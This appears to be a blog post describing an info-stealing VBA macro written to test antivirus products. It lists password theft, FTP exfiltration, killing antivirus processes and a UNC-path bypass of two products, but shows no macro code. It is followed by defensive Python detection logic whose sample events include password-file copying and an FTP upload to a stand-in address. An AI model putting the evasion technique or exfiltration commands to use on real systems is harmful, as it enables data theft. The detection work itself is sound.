Non-Malicious Info-Stealing Macro
- Tiara Productions

- Oct 22, 2017
Finally, I completed my own VBA code for my own test against my favourite next-gen AV products, Panda Adaptive Defense and VoodooShield.
Here are the features of my code:
1) Steals saved passwords from popular browsers such as Chrome, Firefox and Opera.
2) Can steal via a pendrive by opening a bogus or dummy document on the victim's machine.
3) Searches for specific or targeted files/documents that might contain sensitive information such as passwords, company-related data or personal information.
4) Uses no third-party tools, to increase stealth.
5) Uses the Windows built-in FTP command to upload files to a file server.
6) Kills antivirus processes; apparently the Panda Adaptive Defense 360 processes are persistent.
7) Uses non-persistent techniques to ensure traces are gone right after the document is closed. All the work is done after the document is opened.
8) Runs the command line through a UNC path, as it turns out that VoodooShield and Panda Adaptive Defense ignore command-line executions through UNC paths. This might also be the case for other legacy and next-gen AV products, and is something all AV vendors need to look into.
Here is the video I made.
Unlike the DDE method, macros are still powerful, as a lot of the instructions can be carried out without downloading any scripts. Panda Adaptive Defense 360 can easily block any script from being downloaded and executed from a web server. The problem is that my code does not even contain any malicious actions apart from "set source, copy to destination" and "prepare FTP connection, initiate and upload". That's it; what makes it malicious is the INTENTION and the TARGETED DOCUMENTS and FILES.
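From the defender's side, the behaviours listed above (an Office application spawning a shell, invoking the built-in FTP client, or running an executable from a UNC path) are visible in process-creation telemetry even when the individual actions look benign. The following detection logic is an added example, not the author's macro or any vendor's rule; it assumes Sysmon-style field names (ParentImage, Image, CommandLine) and runs over constructed sample events rather than real logs.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "C:\Users\alice\Documents\passwords.xlsx" E:\staging'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"\\fileserver\share\cmd.exe",
     "CommandLine": r"\\fileserver\share\cmd.exe /c ftp -s:C:\Users\alice\AppData\Local\Temp\up.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\ftp.exe",
     "CommandLine": r"ftp.exe -s:C:\temp\script.txt 203.0.113.5"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")  # matches \\host\share


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the list of suspicious traits found in one process-creation event."""
    reasons = []
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return reasons  # only child processes of Office applications are of interest here
    child = basename(event["Image"])
    if child in SHELLS:
        reasons.append("office-spawned shell")
    # The built-in ftp client with a script file (-s:) is the upload channel described above.
    if child == "ftp.exe" or re.search(r"\bftp(\.exe)?\s", event["CommandLine"], re.I):
        reasons.append("office-spawned ftp client")
    # Executables or arguments living on a UNC path are the bypass the post reports.
    if UNC_PATH.search(event["Image"]) or UNC_PATH.search(event["CommandLine"]):
        reasons.append("executable or argument on UNC path")
    return reasons


def scan(events: list) -> list:
    """Return (index, reasons) pairs for every event that triggers at least one trait."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]
```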